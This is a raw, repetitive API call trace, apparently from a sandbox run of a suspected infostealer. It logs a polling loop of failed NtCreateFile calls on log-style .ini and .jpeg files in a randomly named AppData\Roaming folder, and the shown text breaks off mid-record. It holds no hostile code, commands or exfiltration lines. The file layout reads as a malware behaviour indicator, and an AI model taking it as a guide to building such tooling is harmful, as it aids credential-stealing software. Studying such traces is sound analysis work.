RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.684] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.684] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0211.684] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.684] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.684] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.684] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.685] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.685] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.685] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.685] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.685] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.685] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.685] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.685] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.685] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.685] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.685] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.685] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.685] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.686] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.686] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.686] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.686] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.686] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.686] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.686] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.686] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.686] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.686] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.686] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.686] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.686] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.686] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0211.686] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0211.686] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0211.686] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0211.687] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0211.687] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.335] Sleep (dwMilliseconds=0x7d0) [0215.384] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.384] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.384] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0215.385] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.385] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.385] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.385] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.385] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.385] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.385] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.385] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.385] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.385] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.385] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.385] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.385] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.386] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.386] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.386] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.386] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.386] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.386] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.386] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.386] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.386] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, 